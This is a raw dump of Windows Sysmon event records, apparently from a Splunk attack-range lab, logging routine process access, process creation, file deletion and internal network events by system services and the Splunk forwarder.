10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0F2D-6216-1204-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F2D-6216-1204-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.648{4F8D34B0-0F2D-6216-1204-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.413{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ACEE3155900664938C6FF50A7B6DC42,SHA256=8411960E5968486DE0D34EA2B4E0603AEBAF5888F32B4DB6326890CA0BA1DF0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.719{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D1A7E595B563C5B8CF5A58902175106,SHA256=0851804D06BE44980011E4FE0848428797F52AE857986850A7B7F6B4E32FB942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.719{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59871437CBA0B55063B79934DF9C3F18,SHA256=363D4040BBEF443A89BE96F17DAB91CE8613FC992C05363425CC832D45C58910,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:42.668{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53284-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000285878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.328{C8EA50B7-F2AD-6215-B800-000000003802}4348632C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c7758|C:\Windows\System32\windows.storage.dll+3cbd7f|C:\Windows\System32\SHELL32.dll+1d2442|C:\Windows\System32\SHELL32.dll+3e670|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\system32\windows.cortana.Desktop.dll+42239|C:\Windows\system32\windows.cortana.Desktop.dll+318b3|C:\Windows\system32\windows.cortana.Desktop.dll+320d4|C:\Windows\system32\windows.cortana.Desktop.dll+7e45|C:\Windows\system32\windows.cortana.Desktop.dll+81c6|C:\Windows\system32\windows.cortana.Desktop.dll+8209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.328{C8EA50B7-F2AD-6215-B800-000000003802}4348632C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c773c|C:\Windows\System32\windows.storage.dll+3cbd7f|C:\Windows\System32\SHELL32.dll+1d2442|C:\Windows\System32\SHELL32.dll+3e670|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\system32\windows.cortana.Desktop.dll+42239|C:\Windows\system32\windows.cortana.Desktop.dll+318b3|C:\Windows\system32\windows.cortana.Desktop.dll+320d4|C:\Windows\system32\windows.cortana.Desktop.dll+7e45|C:\Windows\system32\windows.cortana.Desktop.dll+81c6|C:\Windows\system32\windows.cortana.Desktop.dll+8209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.328{C8EA50B7-F2AD-6215-B800-000000003802}4348632C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c773c|C:\Windows\System32\windows.storage.dll+3cbd7f|C:\Windows\System32\SHELL32.dll+1d2442|C:\Windows\System32\SHELL32.dll+3e670|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\system32\windows.cortana.Desktop.dll+42239|C:\Windows\system32\windows.cortana.Desktop.dll+318b3|C:\Windows\system32\windows.cortana.Desktop.dll+320d4|C:\Windows\system32\windows.cortana.Desktop.dll+7e45|C:\Windows\system32\windows.cortana.Desktop.dll+81c6|C:\Windows\system32\windows.cortana.Desktop.dll+8209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.328{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B960BC89E7D7A2B98C496BCA2753167E,SHA256=D0B005F2097FB762638C3B6A0B0362E99FFA2C7825CDF8F9907BE0A70278C012,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F2AD-6215-C000-000000003802}48564980C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba0bc|C:\Windows\System32\TwinUI.dll+ba897|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+61d3f|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+5e426|C:\Windows\System32\combase.dll+5dbda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000285873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F2AD-6215-C000-000000003802}48564980C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba0bc|C:\Windows\System32\TwinUI.dll+ba897|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+61d3f|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+5e426|C:\Windows\System32\combase.dll+5dbda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000285872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F2AD-6215-C000-000000003802}48563972C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F2AD-6215-C000-000000003802}48563972C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F2AD-6215-C000-000000003802}48566048C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F2AD-6215-C000-000000003802}48566048C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.313{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41540BA37F6B2870EB5F727EC175C1B,SHA256=5CAA0D6884A888AEE1402B2D81C83AF6740F87C89BC822DD09312D07E01AD0AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.297{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.297{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.297{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.297{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.279{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\System32\mmc.exe10.0.14393.4169 (rs1_release.210107-1130)Microsoft Management ConsoleMicrosoft® Windows® Operating SystemMicrosoft Corporationmmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\gpedit.msc" C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=495BFF5AE1B52661212BB65F1CFDA718,SHA256=A08EC9D2F811726BDCD71F7C5B40CDB543D092C11811A45180E569FE3F62124D,IMPHASH=ED5A55DAB5A02F29D6EE7E0015F91A9F{C8EA50B7-F2AD-6215-B800-000000003802}4348C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding 10341000x8000000000000000285860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.234{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9